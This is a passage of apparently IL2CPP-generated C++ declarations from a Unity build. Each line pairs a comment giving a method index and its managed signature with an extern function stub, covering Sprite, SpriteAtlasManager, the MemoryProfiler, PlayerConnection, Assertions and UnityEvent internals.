// 0x000006BF System.Single UnityEngine.Sprite::get_pixelsPerUnit()
extern void Sprite_get_pixelsPerUnit_m5A5984BC298062DF4CD2CB3E8534443FFCF31826 (void);
// 0x000006C0 UnityEngine.Texture2D UnityEngine.Sprite::get_associatedAlphaSplitTexture()
extern void Sprite_get_associatedAlphaSplitTexture_mBD0221BDF9855712C681C4DDCAD4EFA6EE614FDB (void);
// 0x000006C1 UnityEngine.Vector2 UnityEngine.Sprite::get_pivot()
extern void Sprite_get_pivot_mDFC0A205317DB2F3B6C720B8A5BE1C27D01C1D44 (void);
// 0x000006C2 System.Boolean UnityEngine.Sprite::get_packed()
extern void Sprite_get_packed_m6B6B98A3891B350711499532C07F8D393AAB868E (void);
// 0x000006C3 UnityEngine.SpritePackingMode UnityEngine.Sprite::get_packingMode()
extern void Sprite_get_packingMode_m26DD01B9EC3E832120B4AFB3090F300ACC864A8A (void);
// 0x000006C4 UnityEngine.SpritePackingRotation UnityEngine.Sprite::get_packingRotation()
extern void Sprite_get_packingRotation_m3FD3489CC43013B2D5228AEB1ED8099E6C5B1D10 (void);
// 0x000006C5 UnityEngine.Rect UnityEngine.Sprite::get_textureRect()
extern void Sprite_get_textureRect_m83CAD4AD2F41C02FBE447EBAB92C2AC76EB46D25 (void);
// 0x000006C6 UnityEngine.Vector2[] UnityEngine.Sprite::get_vertices()
extern void Sprite_get_vertices_m2584A7F59A8E8362F16E0DDA4CC25A1EDF8D1D31 (void);
// 0x000006C7 System.UInt16[] UnityEngine.Sprite::get_triangles()
extern void Sprite_get_triangles_m5D2A3D916814891FF5DF236D8A2D72C89A66EFD4 (void);
// 0x000006C8 UnityEngine.Vector2[] UnityEngine.Sprite::get_uv()
extern void Sprite_get_uv_mAD4DAE6EAEC23340B69D0991FA4D8E72C6CA62FF (void);
// 0x000006C9 UnityEngine.Sprite UnityEngine.Sprite::Create(UnityEngine.Texture2D,UnityEngine.Rect,UnityEngine.Vector2,System.Single,System.UInt32,UnityEngine.SpriteMeshType,UnityEngine.Vector4,System.Boolean)
extern void Sprite_Create_m77EEA5081AD2BAD0FF5409BD41E383D9A4AA7083 (void);
// 0x000006CA UnityEngine.Sprite UnityEngine.Sprite::Create(UnityEngine.Texture2D,UnityEngine.Rect,UnityEngine.Vector2,System.Single,System.UInt32,UnityEngine.SpriteMeshType,UnityEngine.Vector4)
extern void Sprite_Create_mDC3D234BAAAF10910F340FAE925AFACE505246B8 (void);
// 0x000006CB UnityEngine.Sprite UnityEngine.Sprite::Create(UnityEngine.Texture2D,UnityEngine.Rect,UnityEngine.Vector2,System.Single,System.UInt32,UnityEngine.SpriteMeshType)
extern void Sprite_Create_m698BC6F4C2416760480C6F94EBEF9922858EF833 (void);
// 0x000006CC UnityEngine.Sprite UnityEngine.Sprite::Create(UnityEngine.Texture2D,UnityEngine.Rect,UnityEngine.Vector2,System.Single,System.UInt32)
extern void Sprite_Create_mF6520A54A2CB06749E057DC5175BB8D13419C7C5 (void);
// 0x000006CD UnityEngine.Sprite UnityEngine.Sprite::Create(UnityEngine.Texture2D,UnityEngine.Rect,UnityEngine.Vector2,System.Single)
extern void Sprite_Create_m1660F4117168DDEF2698FEAF80595DDBE0F9216D (void);
// 0x000006CE System.Void UnityEngine.Sprite::GetTextureRect_Injected(UnityEngine.Rect&)
extern void Sprite_GetTextureRect_Injected_mEF95C771BA50A780B71A632C71BBCD0F92B44A63 (void);
// 0x000006CF System.Void UnityEngine.Sprite::GetInnerUVs_Injected(UnityEngine.Vector4&)
extern void Sprite_GetInnerUVs_Injected_mC34F24437EB70A80781267A638BD909D68A091EA (void);
// 0x000006D0 System.Void UnityEngine.Sprite::GetOuterUVs_Injected(UnityEngine.Vector4&)
extern void Sprite_GetOuterUVs_Injected_m27113B4C012B99AF083390AD49203D329C15544A (void);
// 0x000006D1 System.Void UnityEngine.Sprite::GetPadding_Injected(UnityEngine.Vector4&)
extern void Sprite_GetPadding_Injected_m12B39280FA7B844ADFEAB0BA1355F654755A67E9 (void);
// 0x000006D2 UnityEngine.Sprite UnityEngine.Sprite::CreateSprite_Injected(UnityEngine.Texture2D,UnityEngine.Rect&,UnityEngine.Vector2&,System.Single,System.UInt32,UnityEngine.SpriteMeshType,UnityEngine.Vector4&,System.Boolean)
extern void Sprite_CreateSprite_Injected_m86EA7944DA6E1038A87D579F967315B6A70B28ED (void);
// 0x000006D3 System.Void UnityEngine.Sprite::get_bounds_Injected(UnityEngine.Bounds&)
extern void Sprite_get_bounds_Injected_m987E852C2009674973F2E254460636CF859F411A (void);
// 0x000006D4 System.Void UnityEngine.Sprite::get_rect_Injected(UnityEngine.Rect&)
extern void Sprite_get_rect_Injected_mF254371640E3209C35452CD7CFFD61A06AD4EA97 (void);
// 0x000006D5 System.Void UnityEngine.Sprite::get_border_Injected(UnityEngine.Vector4&)
extern void Sprite_get_border_Injected_m9D59B69C43462D8DBB6186B858264F4E84C3E200 (void);
// 0x000006D6 System.Void UnityEngine.Sprite::get_pivot_Injected(UnityEngine.Vector2&)
extern void Sprite_get_pivot_Injected_m084D8C724F7754DDFB1D7DDF2A5E48DB10C585B9 (void);
// 0x000006D7 System.Boolean UnityEngine._Scripting.APIUpdating.APIUpdaterRuntimeHelpers::GetMovedFromAttributeDataForType(System.Type,System.String&,System.String&,System.String&)
extern void APIUpdaterRuntimeHelpers_GetMovedFromAttributeDataForType_m98AD53EF42F7C84451FC756E268410A1579C858E (void);
// 0x000006D8 System.Boolean UnityEngine._Scripting.APIUpdating.APIUpdaterRuntimeHelpers::GetObsoleteTypeRedirection(System.Type,System.String&,System.String&,System.String&)
extern void APIUpdaterRuntimeHelpers_GetObsoleteTypeRedirection_m341664A1C3A5C4343FDC93CC54F3ED020FE3631C (void);
// 0x000006D9 UnityEngine.Vector4 UnityEngine.Sprites.DataUtility::GetInnerUV(UnityEngine.Sprite)
extern void DataUtility_GetInnerUV_mE24A4A472C99B6BE28AB338537C8583D56F1A502 (void);
// 0x000006DA UnityEngine.Vector4 UnityEngine.Sprites.DataUtility::GetOuterUV(UnityEngine.Sprite)
extern void DataUtility_GetOuterUV_m036E02F9E2726D1A2FD070C12A7ED3C1CF41F642 (void);
// 0x000006DB UnityEngine.Vector4 UnityEngine.Sprites.DataUtility::GetPadding(UnityEngine.Sprite)
extern void DataUtility_GetPadding_mBCB6804FB0875EA1AC2FF55405AA6C1A2903E258 (void);
// 0x000006DC UnityEngine.Vector2 UnityEngine.Sprites.DataUtility::GetMinSize(UnityEngine.Sprite)
extern void DataUtility_GetMinSize_m12DA75277811A48FF075DFDDC8BEAFC2F23506FD (void);
// 0x000006DD System.Boolean UnityEngine.U2D.SpriteAtlasManager::RequestAtlas(System.String)
extern void SpriteAtlasManager_RequestAtlas_m2999088C9435693FBAE4FF101D28D889931C79EF (void);
// 0x000006DE System.Void UnityEngine.U2D.SpriteAtlasManager::add_atlasRegistered(System.Action`1<UnityEngine.U2D.SpriteAtlas>)
extern void SpriteAtlasManager_add_atlasRegistered_mF83F3AEB343B2111048330DCBBC25688B5F5F7AD (void);
// 0x000006DF System.Void UnityEngine.U2D.SpriteAtlasManager::remove_atlasRegistered(System.Action`1<UnityEngine.U2D.SpriteAtlas>)
extern void SpriteAtlasManager_remove_atlasRegistered_m606C351B26C01824C922ACF29708D85F35072E9F (void);
// 0x000006E0 System.Void UnityEngine.U2D.SpriteAtlasManager::PostRegisteredAtlas(UnityEngine.U2D.SpriteAtlas)
extern void SpriteAtlasManager_PostRegisteredAtlas_mC299319B185D829E9CD66CFAE5912E131F6A0335 (void);
// 0x000006E1 System.Void UnityEngine.U2D.SpriteAtlasManager::Register(UnityEngine.U2D.SpriteAtlas)
extern void SpriteAtlasManager_Register_m907E9FEE5A7E9C41F406F4D18CBB998FE0F9B1FA (void);
// 0x000006E2 System.Boolean UnityEngine.U2D.SpriteAtlas::CanBindTo(UnityEngine.Sprite)
extern void SpriteAtlas_CanBindTo_mB4326EC04E7C2CC9D43AE04AEE9B91171F3BFA01 (void);
// 0x000006E3 System.Void UnityEngine.Profiling.Experimental.DebugScreenCapture::set_rawImageDataReference(Unity.Collections.NativeArray`1<System.Byte>)
extern void DebugScreenCapture_set_rawImageDataReference_mB19FBA997F9FDDE05F33ECDF900F299DEFB7001D (void);
// 0x000006E4 System.Void UnityEngine.Profiling.Experimental.DebugScreenCapture::set_imageFormat(UnityEngine.TextureFormat)
extern void DebugScreenCapture_set_imageFormat_m375ECF2BFAC85011D5493B7DE5676B2EC3BA1DFB (void);
// 0x000006E5 System.Void UnityEngine.Profiling.Experimental.DebugScreenCapture::set_width(System.Int32)
extern void DebugScreenCapture_set_width_m1200EF0961699A652475F0590BE8D65A583F01A1 (void);
// 0x000006E6 System.Void UnityEngine.Profiling.Experimental.DebugScreenCapture::set_height(System.Int32)
extern void DebugScreenCapture_set_height_m1798855FA1504E5092D6345264322E4D21B6C2A0 (void);
// 0x000006E7 System.Void UnityEngine.Profiling.Memory.Experimental.MetaData::.ctor()
extern void MetaData__ctor_m97F5D6737326E4786030786484BFB87377E7E842 (void);
// 0x000006E8 System.Byte[] UnityEngine.Profiling.Memory.Experimental.MemoryProfiler::PrepareMetadata()
extern void MemoryProfiler_PrepareMetadata_m9E316562D70D6AC778FD4F0150C6B450BEE89550 (void);
// 0x000006E9 System.Int32 UnityEngine.Profiling.Memory.Experimental.MemoryProfiler::WriteIntToByteArray(System.Byte[],System.Int32,System.Int32)
extern void MemoryProfiler_WriteIntToByteArray_m012037DAD117E883EC6E4BF650FE4A6A6E9D1914 (void);
// 0x000006EA System.Int32 UnityEngine.Profiling.Memory.Experimental.MemoryProfiler::WriteStringToByteArray(System.Byte[],System.Int32,System.String)
extern void MemoryProfiler_WriteStringToByteArray_m265DDB0BCF1426606F98400A31BD9EA8A4110048 (void);
// 0x000006EB System.Void UnityEngine.Profiling.Memory.Experimental.MemoryProfiler::FinalizeSnapshot(System.String,System.Boolean)
extern void MemoryProfiler_FinalizeSnapshot_m4504D9112FFBC6E60933B5E28535775F8D31288F (void);
// 0x000006EC System.Void UnityEngine.Profiling.Memory.Experimental.MemoryProfiler::SaveScreenshotToDisk(System.String,System.Boolean,System.IntPtr,System.Int32,UnityEngine.TextureFormat,System.Int32,System.Int32)
extern void MemoryProfiler_SaveScreenshotToDisk_mB9688ED57BF5A2CBC8FF2D1A518725A99CDDC7C8 (void);
// 0x000006ED System.Void UnityEngine.Networking.PlayerConnection.MessageEventArgs::.ctor()
extern void MessageEventArgs__ctor_m66E6239501EEE8FCE1DA218E8189F46FB0669A45 (void);
// 0x000006EE UnityEngine.Networking.PlayerConnection.PlayerConnection UnityEngine.Networking.PlayerConnection.PlayerConnection::get_instance()
extern void PlayerConnection_get_instance_m8F2B9C9F3AF41AC7A2FB617B5A700811E2444C14 (void);
// 0x000006EF System.Boolean UnityEngine.Networking.PlayerConnection.PlayerConnection::get_isConnected()
extern void PlayerConnection_get_isConnected_mFDFB30D1AD4A7BFC66207092270E86B8D467209D (void);
// 0x000006F0 UnityEngine.Networking.PlayerConnection.PlayerConnection UnityEngine.Networking.PlayerConnection.PlayerConnection::CreateInstance()
extern void PlayerConnection_CreateInstance_mA2B0AB3CCD81948E3F28463B458FDA68424D1DA0 (void);
// 0x000006F1 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::OnEnable()
extern void PlayerConnection_OnEnable_m3BE74152671ABA48E7AD707773B93F57BDA53002 (void);
// 0x000006F2 UnityEngine.IPlayerEditorConnectionNative UnityEngine.Networking.PlayerConnection.PlayerConnection::GetConnectionNativeApi()
extern void PlayerConnection_GetConnectionNativeApi_mDF3BB4FF695E3ED19E525951FEED123C52FB4781 (void);
// 0x000006F3 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::Register(System.Guid,UnityEngine.Events.UnityAction`1<UnityEngine.Networking.PlayerConnection.MessageEventArgs>)
extern void PlayerConnection_Register_m8760D786583FD5793A2FCE5EEB8DDA17C649CF86 (void);
// 0x000006F4 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::Unregister(System.Guid,UnityEngine.Events.UnityAction`1<UnityEngine.Networking.PlayerConnection.MessageEventArgs>)
extern void PlayerConnection_Unregister_m46303AD2C27A3A71B6569376E5C461AF1D0DFCE1 (void);
// 0x000006F5 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::RegisterConnection(UnityEngine.Events.UnityAction`1<System.Int32>)
extern void PlayerConnection_RegisterConnection_mF9F575D16B80B1299D0E058E5F4A8DBAA907784F (void);
// 0x000006F6 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::RegisterDisconnection(UnityEngine.Events.UnityAction`1<System.Int32>)
extern void PlayerConnection_RegisterDisconnection_m2D2554B55821F11EB89442D54125A5C2984E0EC2 (void);
// 0x000006F7 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::UnregisterConnection(UnityEngine.Events.UnityAction`1<System.Int32>)
extern void PlayerConnection_UnregisterConnection_m0213376CEDCAAF5AF7C49226660C2F2182F2E1FD (void);
// 0x000006F8 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::UnregisterDisconnection(UnityEngine.Events.UnityAction`1<System.Int32>)
extern void PlayerConnection_UnregisterDisconnection_mB2E0A093BA8F75B183A2774CA49FD5762B4E8A6E (void);
// 0x000006F9 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::Send(System.Guid,System.Byte[])
extern void PlayerConnection_Send_mBFE41D75C28DF0885455CE809D40C489818F91B7 (void);
// 0x000006FA System.Boolean UnityEngine.Networking.PlayerConnection.PlayerConnection::TrySend(System.Guid,System.Byte[])
extern void PlayerConnection_TrySend_m6D589698ADF1E9A0E4CC208651F6CC86AD572423 (void);
// 0x000006FB System.Boolean UnityEngine.Networking.PlayerConnection.PlayerConnection::BlockUntilRecvMsg(System.Guid,System.Int32)
extern void PlayerConnection_BlockUntilRecvMsg_mBDA2944F58B7984DDFA6A998CA558FC43B64896F (void);
// 0x000006FC System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::DisconnectAll()
extern void PlayerConnection_DisconnectAll_mDC4057C27894D4216DF83A9EF9107C86AA3C5D03 (void);
// 0x000006FD System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::MessageCallbackInternal(System.IntPtr,System.UInt64,System.UInt64,System.String)
extern void PlayerConnection_MessageCallbackInternal_m4157F80F90CF0626C5B82FB1598873F974F3B8A1 (void);
// 0x000006FE System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::ConnectedCallbackInternal(System.Int32)
extern void PlayerConnection_ConnectedCallbackInternal_mD060297F076F310BDC42B468F076E054587C62FC (void);
// 0x000006FF System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::DisconnectedCallback(System.Int32)
extern void PlayerConnection_DisconnectedCallback_m2079BD18D92A4B18246D143FF34BAEC70CEA2FA6 (void);
// 0x00000700 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection::.ctor()
extern void PlayerConnection__ctor_m03E1218C1A0210FFDC4E2B2E2F79B7416E9D8F11 (void);
// 0x00000701 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection/<>c__DisplayClass12_0::.ctor()
extern void U3CU3Ec__DisplayClass12_0__ctor_m07EBBD06394F8590D2B8DFD50B6D1EE94ABB0CBB (void);
// 0x00000702 System.Boolean UnityEngine.Networking.PlayerConnection.PlayerConnection/<>c__DisplayClass12_0::<Register>b__0(UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/MessageTypeSubscribers)
extern void U3CU3Ec__DisplayClass12_0_U3CRegisterU3Eb__0_mAC55D4E3203F06ED7F9872599F1CF02DF2430859 (void);
// 0x00000703 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection/<>c__DisplayClass13_0::.ctor()
extern void U3CU3Ec__DisplayClass13_0__ctor_m6AA357ABA48CA75462E938084C7953E820CB18AA (void);
// 0x00000704 System.Boolean UnityEngine.Networking.PlayerConnection.PlayerConnection/<>c__DisplayClass13_0::<Unregister>b__0(UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/MessageTypeSubscribers)
extern void U3CU3Ec__DisplayClass13_0_U3CUnregisterU3Eb__0_m929D945DEF8430CA1E953420F9C28F43198F9FF5 (void);
// 0x00000705 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection/<>c__DisplayClass20_0::.ctor()
extern void U3CU3Ec__DisplayClass20_0__ctor_m75B603A2B5F9AB50F7A52CCD844186FE1A6981AA (void);
// 0x00000706 System.Void UnityEngine.Networking.PlayerConnection.PlayerConnection/<>c__DisplayClass20_0::<BlockUntilRecvMsg>b__0(UnityEngine.Networking.PlayerConnection.MessageEventArgs)
extern void U3CU3Ec__DisplayClass20_0_U3CBlockUntilRecvMsgU3Eb__0_mE65B4F1DEAC961650E79C59F69302B4AC63CE3F1 (void);
// 0x00000707 System.Void UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents::InvokeMessageIdSubscribers(System.Guid,System.Byte[],System.Int32)
extern void PlayerEditorConnectionEvents_InvokeMessageIdSubscribers_m67F47A7AA6EC55A672AD1020F329C4332BEEFFAE (void);
// 0x00000708 UnityEngine.Events.UnityEvent`1<UnityEngine.Networking.PlayerConnection.MessageEventArgs> UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents::AddAndCreate(System.Guid)
extern void PlayerEditorConnectionEvents_AddAndCreate_mB3B1355A8FDC43E5974CC3DE5BB17CB0C4328308 (void);
// 0x00000709 System.Void UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents::UnregisterManagedCallback(System.Guid,UnityEngine.Events.UnityAction`1<UnityEngine.Networking.PlayerConnection.MessageEventArgs>)
extern void PlayerEditorConnectionEvents_UnregisterManagedCallback_m61A82E77AA85A903BE0E534FEE601CABF9DE7809 (void);
// 0x0000070A System.Void UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents::.ctor()
extern void PlayerEditorConnectionEvents__ctor_mA1F7A1F05DA196CDC66A85361C5589F504C557B3 (void);
// 0x0000070B System.Void UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/MessageEvent::.ctor()
extern void MessageEvent__ctor_mD99E3A2C521C8B2B544F5DF2376258E9613D08EE (void);
// 0x0000070C System.Void UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/ConnectionChangeEvent::.ctor()
extern void ConnectionChangeEvent__ctor_mEEB8C3ABC40815A0BBC2EEEEAD77ACAE1A6A0554 (void);
// 0x0000070D System.Guid UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/MessageTypeSubscribers::get_MessageTypeId()
extern void MessageTypeSubscribers_get_MessageTypeId_m782C2CCF400D0C5A0FB343FBE1B66C9C09971449 (void);
// 0x0000070E System.Void UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/MessageTypeSubscribers::set_MessageTypeId(System.Guid)
extern void MessageTypeSubscribers_set_MessageTypeId_m4FA721221C0D7812EA1AFB6C406C0620FF06761B (void);
// 0x0000070F System.Void UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/MessageTypeSubscribers::.ctor()
extern void MessageTypeSubscribers__ctor_mFC17A12701D7DB8739ABF17DB1D5EC41531CFED6 (void);
// 0x00000710 System.Void UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/<>c__DisplayClass6_0::.ctor()
extern void U3CU3Ec__DisplayClass6_0__ctor_m2EE8CF87D7C3816A57E4D6238DEA0660DB2C7303 (void);
// 0x00000711 System.Boolean UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/<>c__DisplayClass6_0::<InvokeMessageIdSubscribers>b__0(UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/MessageTypeSubscribers)
extern void U3CU3Ec__DisplayClass6_0_U3CInvokeMessageIdSubscribersU3Eb__0_mAB457C850FBAB1CF66C7EFAAE9F57EAD0FED6CFF (void);
// 0x00000712 System.Void UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/<>c__DisplayClass7_0::.ctor()
extern void U3CU3Ec__DisplayClass7_0__ctor_mC3BBDE08CDDEF0DA0811796906BA4A74C287CC2E (void);
// 0x00000713 System.Boolean UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/<>c__DisplayClass7_0::<AddAndCreate>b__0(UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/MessageTypeSubscribers)
extern void U3CU3Ec__DisplayClass7_0_U3CAddAndCreateU3Eb__0_mD687F2BC0FE80692E5F88480DC5B861FE122F82E (void);
// 0x00000714 System.Void UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/<>c__DisplayClass8_0::.ctor()
extern void U3CU3Ec__DisplayClass8_0__ctor_mEFD5A284D56758F6EA5F97C12FDE739E7E1C2C93 (void);
// 0x00000715 System.Boolean UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/<>c__DisplayClass8_0::<UnregisterManagedCallback>b__0(UnityEngine.Networking.PlayerConnection.PlayerEditorConnectionEvents/MessageTypeSubscribers)
extern void U3CU3Ec__DisplayClass8_0_U3CUnregisterManagedCallbackU3Eb__0_m3906587CC8F4CF5B752383CE6EA540B27E67055D (void);
// 0x00000716 System.Void UnityEngine.Assertions.Assert::Fail(System.String,System.String)
extern void Assert_Fail_m3519CAFE4134C1C51921E9D4789A42E51B911629 (void);
// 0x00000717 System.Void UnityEngine.Assertions.Assert::IsTrue(System.Boolean)
extern void Assert_IsTrue_m34B8FFDACB5799F12CBAA200C8AB844AF98B4DD0 (void);
// 0x00000718 System.Void UnityEngine.Assertions.Assert::IsTrue(System.Boolean,System.String)
extern void Assert_IsTrue_mF398159A7A5B43CE3054A41BD7B7D97AA8E9DDB4 (void);
// 0x00000719 System.Void UnityEngine.Assertions.Assert::IsFalse(System.Boolean,System.String)
extern void Assert_IsFalse_m5E4EA97BFC06F9EFBD3423534FBB342F589166D6 (void);
// 0x0000071A System.Void UnityEngine.Assertions.Assert::AreEqual(T,T)
// 0x0000071B System.Void UnityEngine.Assertions.Assert::AreEqual(T,T,System.String)
// 0x0000071C System.Void UnityEngine.Assertions.Assert::AreEqual(T,T,System.String,System.Collections.Generic.IEqualityComparer`1<T>)
// 0x0000071D System.Void UnityEngine.Assertions.Assert::AreEqual(UnityEngine.Object,UnityEngine.Object,System.String)
extern void Assert_AreEqual_m04CFE6BB41B0A3F2125C791EC02DC881653BBDB4 (void);
// 0x0000071E System.Void UnityEngine.Assertions.Assert::AreNotEqual(T,T)
// 0x0000071F System.Void UnityEngine.Assertions.Assert::AreNotEqual(T,T,System.String)
// 0x00000720 System.Void UnityEngine.Assertions.Assert::AreNotEqual(T,T,System.String,System.Collections.Generic.IEqualityComparer`1<T>)
// 0x00000721 System.Void UnityEngine.Assertions.Assert::AreNotEqual(UnityEngine.Object,UnityEngine.Object,System.String)
extern void Assert_AreNotEqual_mFDBFC2C4E9C32D6744A9BD8C206B73CCED6F4A75 (void);
// 0x00000722 System.Void UnityEngine.Assertions.Assert::IsNull(T)
// 0x00000723 System.Void UnityEngine.Assertions.Assert::IsNull(T,System.String)
// 0x00000724 System.Void UnityEngine.Assertions.Assert::IsNull(UnityEngine.Object,System.String)
extern void Assert_IsNull_m4F2DEF8EA495AE4102FD5801B7B2906F3EBB7954 (void);
// 0x00000725 System.Void UnityEngine.Assertions.Assert::IsNotNull(T)
// 0x00000726 System.Void UnityEngine.Assertions.Assert::IsNotNull(T,System.String)
// 0x00000727 System.Void UnityEngine.Assertions.Assert::IsNotNull(UnityEngine.Object,System.String)
extern void Assert_IsNotNull_m247BE2D851C5B85C2C4AE3C0A867F472F532E95A (void);
// 0x00000728 System.Void UnityEngine.Assertions.Assert::AreEqual(System.Int32,System.Int32)
extern void Assert_AreEqual_m90907707D9FCBCC3AC34896629322F2A64303CE8 (void);
// 0x00000729 System.Void UnityEngine.Assertions.Assert::.cctor()
extern void Assert__cctor_m4F5D4336EFAB36FEDD4144AA8DC31EE08D43A137 (void);
// 0x0000072A System.Void UnityEngine.Assertions.AssertionException::.ctor(System.String,System.String)
extern void AssertionException__ctor_m01CD9ADC1B0067C20CDC2A0697BBF3969E67FEB6 (void);
// 0x0000072B System.String UnityEngine.Assertions.AssertionException::get_Message()
extern void AssertionException_get_Message_m4320D1607BDF97D451569837340C8E4A04461089 (void);
// 0x0000072C System.String UnityEngine.Assertions.AssertionMessageUtil::GetMessage(System.String)
extern void AssertionMessageUtil_GetMessage_m06D253B5ABE9D86D2E003DD1FCD8E13C147CF861 (void);
// 0x0000072D System.String UnityEngine.Assertions.AssertionMessageUtil::GetMessage(System.String,System.String)
extern void AssertionMessageUtil_GetMessage_m856DF8CA4776F4BDF11710487275D4570478A01A (void);
// 0x0000072E System.String UnityEngine.Assertions.AssertionMessageUtil::GetEqualityMessage(System.Object,System.Object,System.Boolean)
extern void AssertionMessageUtil_GetEqualityMessage_m407D97A5CA58CA8457A02D7BF1699C83B566329E (void);
// 0x0000072F System.String UnityEngine.Assertions.AssertionMessageUtil::NullFailureMessage(System.Object,System.Boolean)
extern void AssertionMessageUtil_NullFailureMessage_mAE978DCD05290E368DB8F6D5DD9D0D1A4676C488 (void);
// 0x00000730 System.String UnityEngine.Assertions.AssertionMessageUtil::BooleanFailureMessage(System.Boolean)
extern void AssertionMessageUtil_BooleanFailureMessage_m48DE751CF4DED89919885F74602856E28777E069 (void);
// 0x00000731 System.String UnityEngine.Events.UnityEventTools::TidyAssemblyTypeName(System.String)
extern void UnityEventTools_TidyAssemblyTypeName_mC14AF90F32E78652143E181365262D0B3D1487ED (void);
// 0x00000732 UnityEngine.Object UnityEngine.Events.ArgumentCache::get_unityObjectArgument()
extern void ArgumentCache_get_unityObjectArgument_mEA22BE8C25CDC789963C2DABF068E88147A66C69 (void);
// 0x00000733 System.String UnityEngine.Events.ArgumentCache::get_unityObjectArgumentAssemblyTypeName()
extern void ArgumentCache_get_unityObjectArgumentAssemblyTypeName_m85640B88D8DA790019005A4ADD948E036ED79694 (void);
// 0x00000734 System.Int32 UnityEngine.Events.ArgumentCache::get_intArgument()
extern void ArgumentCache_get_intArgument_m7515338C0F3B5843E40CC48C303D2EFC02D9C19C (void);
// 0x00000735 System.Single UnityEngine.Events.ArgumentCache::get_floatArgument()
extern void ArgumentCache_get_floatArgument_mDED33C174CAD9DFAD58F9D6DF482557C0FC20D38 (void);
// 0x00000736 System.String UnityEngine.Events.ArgumentCache::get_stringArgument()
extern void ArgumentCache_get_stringArgument_m4CA65BC60FC1FDCE88779C009ED0E1DC4BED2D9A (void);
// 0x00000737 System.Boolean UnityEngine.Events.ArgumentCache::get_boolArgument()
extern void ArgumentCache_get_boolArgument_mB7A56994202FCB50BA04A6DBED9BAC45871F700A (void);
// 0x00000738 System.Void UnityEngine.Events.ArgumentCache::OnBeforeSerialize()
extern void ArgumentCache_OnBeforeSerialize_mF01AF8DE34554D86AEC843FEB41D14F3172D481F (void);
// 0x00000739 System.Void UnityEngine.Events.ArgumentCache::OnAfterDeserialize()
extern void ArgumentCache_OnAfterDeserialize_mD1C2E914447C2F69B43850F15AB19B62AF49DE96 (void);
// 0x0000073A System.Void UnityEngine.Events.ArgumentCache::.ctor()
extern void ArgumentCache__ctor_m8410B763CA027E30237E5954888A7F508800A331 (void);
// 0x0000073B System.Void UnityEngine.Events.BaseInvokableCall::.ctor()
extern void BaseInvokableCall__ctor_mD64C67D6FFB881F98555408743D7BB5CA7217B39 (void);
// 0x0000073C System.Void UnityEngine.Events.BaseInvokableCall::.ctor(System.Object,System.Reflection.MethodInfo)
extern void BaseInvokableCall__ctor_m7633F06F55DFC3324C46A7C3DD6C55DC949FA0FE (void);
// 0x0000073D System.Void UnityEngine.Events.BaseInvokableCall::Invoke(System.Object[])
// 0x0000073E System.Void UnityEngine.Events.BaseInvokableCall::ThrowOnInvalidArg(System.Object)
// 0x0000073F System.Boolean UnityEngine.Events.BaseInvokableCall::AllowInvoke(System.Delegate)
extern void BaseInvokableCall_AllowInvoke_m1BF468FF253B7A087B32A66F5D27285D7DD39187 (void);
// 0x00000740 System.Boolean UnityEngine.Events.BaseInvokableCall::Find(System.Object,System.Reflection.MethodInfo)
// 0x00000741 System.Void UnityEngine.Events.InvokableCall::add_Delegate(UnityEngine.Events.UnityAction)
extern void InvokableCall_add_Delegate_m5AD40C6D21D67A44980DF3B99946C4A2F17D9A10 (void);
// 0x00000742 System.Void UnityEngine.Events.InvokableCall::remove_Delegate(UnityEngine.Events.UnityAction)
extern void InvokableCall_remove_Delegate_mB8464CD88899199AAA70CD5EA4E02DCFB16045E1 (void);
// 0x00000743 System.Void UnityEngine.Events.InvokableCall::.ctor(System.Object,System.Reflection.MethodInfo)
extern void InvokableCall__ctor_mF3F94B432C977EE2DE7834EC2936E90D271C0464 (void);
// 0x00000744 System.Void UnityEngine.Events.InvokableCall::.ctor(UnityEngine.Events.UnityAction)
extern void InvokableCall__ctor_m4FA1428E3A33219B2C8C5C571A705AC6B862FA70 (void);
// 0x00000745 System.Void UnityEngine.Events.InvokableCall::Invoke(System.Object[])
extern void InvokableCall_Invoke_m874703DD260A64342495E79986B31EDA8D06C1F4 (void);
// 0x00000746 System.Void UnityEngine.Events.InvokableCall::Invoke()
extern void InvokableCall_Invoke_m6F4828FD2B3E3BBB7AA6EECC2C37FB08538363F4 (void);
// 0x00000747 System.Boolean UnityEngine.Events.InvokableCall::Find(System.Object,System.Reflection.MethodInfo)
extern void InvokableCall_Find_mC76E5065AEEFC89956540199A4CB92E953E4B32F (void);
// 0x00000748 System.Void UnityEngine.Events.InvokableCall`1::add_Delegate(UnityEngine.Events.UnityAction`1<T1>)
